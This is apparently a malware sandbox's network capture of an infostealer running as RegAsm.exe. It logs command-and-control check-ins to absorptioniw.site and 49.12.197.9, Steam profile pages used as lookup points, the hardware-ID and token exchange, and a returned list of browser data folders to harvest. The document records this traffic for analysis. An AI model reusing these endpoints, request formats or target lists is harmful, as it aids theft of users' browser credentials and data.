                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jVne916fF25kcJt2mMSdk2WDXUkPSvgdBtJ7%2FiFAx4Kt2Jy%2Bhhcm3HuyI%2Bceg8fkF%2FA8QR43szaUlwEiHvd9f0%2BEA9hRJh8i7Rfj2PsYfaCiHlOeIvJpuOrIvMjfzmyRC7k%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c83dba9dc42a-EWR
                                                                                                                                                                                                                                          2024-10-02 12:44:09 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                          Data Ascii: aerror #D12
                                                                                                                                                                                                                                          2024-10-02 12:44:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          60192.168.2.658583104.21.17.1744432496C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:10 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                          Host: absorptioniw.site
                                                                                                                                                                                                                                          2024-10-02 12:44:10 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                          2024-10-02 12:44:11 UTC772INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:10 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=4lisu2l2kcb43g08vsdl8d6hq5; expires=Sun, 26 Jan 2025 06:30:49 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XqZ93NXhDrbFcciILSmyx4q49qMa%2B5nduLmlfMg4tPLl4kUnjBRPDEoT4cfFZODIqNnmXD1OkPbmJHoj%2BXQJ9j6KKv1noKOgwhEOBG3pf3NNEQWhY1JdWcLgK8e53Nr4UMmSCQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c8463b878c21-EWR
                                                                                                                                                                                                                                          2024-10-02 12:44:11 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                          Data Ascii: aerror #D12
                                                                                                                                                                                                                                          2024-10-02 12:44:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          61192.168.2.658585104.102.49.2544432496C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:11 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Host: steamcommunity.com
                                                                                                                                                                                                                                          2024-10-02 12:44:12 UTC1870INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:12 GMT
                                                                                                                                                                                                                                          Content-Length: 25489
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Set-Cookie: sessionid=d361dace66def6f89111ca50; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                          Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                          2024-10-02 12:44:12 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                                                                          2024-10-02 12:44:12 UTC10975INData Raw: 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 69 74 65 6d 20 74 69 67 68 74 22 20 68 72 65 66 3d 22 3f 6c 3d 74 68 61 69 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 74 68 61 69 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e e0 b9 84 e0 b8 97 e0 b8 a2 20 28 54 68 61 69 29 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 69 74 65 6d 20 74 69 67 68 74 22 20 68 72 65 66 3d 22 3f 6c 3d 62 75 6c 67 61 72 69 61 6e 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 62 75 6c 67 61 72 69 61 6e 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61
                                                                                                                                                                                                                                          Data Ascii: <a class="popup_menu_item tight" href="?l=thai" onclick="ChangeLanguage( 'thai' ); return false;"> (Thai)</a><a class="popup_menu_item tight" href="?l=bulgarian" onclick="ChangeLanguage( 'bulgarian' ); return fa


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          62192.168.2.658586104.102.49.2544435316C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:12 UTC119OUTGET /profiles/76561199780418869 HTTP/1.1
                                                                                                                                                                                                                                          Host: steamcommunity.com
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:44:13 UTC1870INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:13 GMT
                                                                                                                                                                                                                                          Content-Length: 34879
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Set-Cookie: sessionid=0448c5b6ccabb9c8f1c31ade; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                          Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                          2024-10-02 12:44:13 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                                                                          2024-10-02 12:44:13 UTC16384INData Raw: 52 54 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34
                                                                                                                                                                                                                                          Data Ascii: RT</a></div><script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4
                                                                                                                                                                                                                                          2024-10-02 12:44:13 UTC3768INData Raw: 75 6d 6d 61 72 79 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72
                                                                                                                                                                                                                                          Data Ascii: ummary"></div><div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><scr
                                                                                                                                                                                                                                          2024-10-02 12:44:13 UTC213INData Raw: 63 6b 3d 22 52 65 73 70 6f 6e 73 69 76 65 5f 52 65 71 75 65 73 74 4d 6f 62 69 6c 65 56 69 65 77 28 29 22 3e 0d 0a 09 09 09 09 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                          Data Ascii: ck="Responsive_RequestMobileView()"><span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          63192.168.2.65858749.12.197.94435316C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:14 UTC184OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:44:15 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:14 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          2024-10-02 12:44:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          64192.168.2.65858949.12.197.94435316C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:15 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----HCAFIJDGHCBFHJKFCGIE
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Content-Length: 256
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:44:15 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 43 30 38 43 39 33 43 36 34 34 33 33 34 33 30 33 37 33 35 33 31 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 2d 2d 0d
                                                                                                                                                                                                                                          Data Ascii: ------HCAFIJDGHCBFHJKFCGIEContent-Disposition: form-data; name="hwid"7C08C93C64433430373531-a33c7340-61ca------HCAFIJDGHCBFHJKFCGIEContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------HCAFIJDGHCBFHJKFCGIE--
                                                                                                                                                                                                                                          2024-10-02 12:44:16 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:16 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          2024-10-02 12:44:16 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 63 61 62 34 38 37 63 38 33 65 33 63 64 64 37 64 38 65 39 35 65 38 34 35 39 35 38 65 33 62 61 34 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 3a1|1|1|1|cab487c83e3cdd7d8e95e845958e3ba4|1|1|1|0|0|50000|10


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          65192.168.2.65859149.12.197.94435316C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:17 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----GHJKJDAKEHJDGDGDGHID
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:44:17 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 61 62 34 38 37 63 38 33 65 33 63 64 64 37 64 38 65 39 35 65 38 34 35 39 35 38 65 33 62 61 34 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                          Data Ascii: ------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="token"cab487c83e3cdd7d8e95e845958e3ba4------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------GHJKJDAKEHJDGDGDGHIDCont
                                                                                                                                                                                                                                          2024-10-02 12:44:18 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:17 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          2024-10-02 12:44:18 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                                                                                                                                                                          Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          66192.168.2.65859249.12.197.94435316C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:18 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----DHIEBAAKJDHIECAAFHCA
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:44:18 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 61 62 34 38 37 63 38 33 65 33 63 64 64 37 64 38 65 39 35 65 38 34 35 39 35 38 65 33 62 61 34 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                          Data Ascii: ------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="token"cab487c83e3cdd7d8e95e845958e3ba4------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------DHIEBAAKJDHIECAAFHCACont
                                                                                                                                                                                                                                          2024-10-02 12:44:19 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:19 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
